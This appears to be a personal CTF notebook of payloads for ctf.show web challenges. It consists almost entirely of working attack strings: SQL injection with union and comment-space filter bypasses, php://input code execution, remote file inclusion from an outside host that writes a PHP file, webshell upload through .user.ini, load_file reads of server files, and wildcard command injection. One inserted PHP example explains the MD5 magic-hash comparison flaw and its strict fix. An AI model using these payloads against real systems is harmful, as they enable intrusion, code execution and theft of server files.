Payloads or brief notes only; continuously updated.
web2
admin' or 1=1#
admin' or 1=1 union select 1,group_concat(flag),3 from web2.flag#
web3
http://bd154800-80c7-4e24-9175-4eb98b4d3584.chall.ctf.show/?url=php://input
POST: <?php system("ls");?>
POST: <?php system("cat ctf_go_go_go");?>
web4
Remote file inclusion:
486f9d64-fe46-4c00-8da3-8a31d154530b.chall.ctf.show/?url=http://hausahan.cn/temp.txt
# Contents of temp.txt:
<?php
$myfile=fopen('temp.php','w');
// placeholder string (pinyin for "trojan contents")
$txt = 'mumaneirong';
fwrite($myfile,$txt);
fclose($myfile);
?>
486f9d64-fe46-4c00-8da3-8a31d154530b.chall.ctf.show/temp.php?hausa=cat ./../flag.txt
web5
MD5 collision
62499f30-4ef5-4609-80f0-0e8211a8a225.chall.ctf.show/?v1=QNKCDZO&v2=240610708
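Why the two web5 values pass a loose MD5 comparison, and the strict check that rejects them, as an added example (not the challenge's source or the author's code; the function names and the shape of the check are assumptions):

```php
<?php
// Added example. Constructed inputs: the two values from the web5 payload.
$v1 = 'QNKCDZO';
$v2 = '240610708';

// Weak check: loose comparison of two hex digests.
// When both digests look like "0e<digits>", PHP treats them as numeric
// strings in scientific notation and compares them as floats (0 == 0).
function weak_equal(string $a, string $b): bool {
    return md5($a) == md5($b);
}

// Hardened check: byte-wise, constant-time comparison with no type juggling.
function strict_equal(string $a, string $b): bool {
    return hash_equals(md5($a), md5($b));
}

// Audit helper: true when a digest would be read as zero by a loose comparison.
function is_magic_hash(string $digest): bool {
    return preg_match('/^0+e\d+$/', $digest) === 1;
}

foreach ([$v1, $v2] as $v) {
    $digest = md5($v);
    printf("%-10s md5=%s magic=%s\n", $v, $digest,
        var_export(is_magic_hash($digest), true));
}

// The inputs differ, so only the loose comparison reports a match.
var_dump(weak_equal($v1, $v2));
var_dump(strict_equal($v1, $v2));
```

The same rule applies wherever a digest or token is compared in PHP: use hash_equals() or ===, never ==.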
web6
admin'/**/union/**/select/**/1,concat(flag),3/**/from/**/flag#
web7
0fcebb43-b8f7-44cb-a460-95f836ed7773.chall.ctf.show/index.php?id=1'/**/union/**/select/**/1,concat(flag),3/**/from/**/flag#
web8
Single quotes and commas are filtered.
Solution script: https://github.com/hausa-han/CTFscripts/blob/main/ctfshow-web8.py
web9
POST: password=ffifdyop
web10
username: admin'/**/or/**/1=1/**/group/**/by/**/password/**/with/**/rollup#
web11
Delete the cookie, then log in with an empty password.
web12
system() is disabled;
?cmd=print_r(glob("*"));
?cmd=highlight_file("xxxx.php");
web13
Upload a webshell as a .txt file, then upload a .user.ini that sets auto_prepend_file to that webshell.
web14
/here_1s_your_f1ag.php?query=-1//union//select/**/load_file('/var/www/html/secret.php')
?query=-1//union//select/**/load_file('/real_flag_is_here')
CTFshow web1
www.zip
user_main.php offers different sort orders for the listing, which lets the flag be guessed step by step; the following script does this:
https://github.com/hausa-han/CTFscripts/blob/main/CTFshow_web1.py
Red Envelope Challenge, Part 2 (红包题第二弹)
/?cmd=?>/???/?p /???????? p.ppp;?>
/p.ppp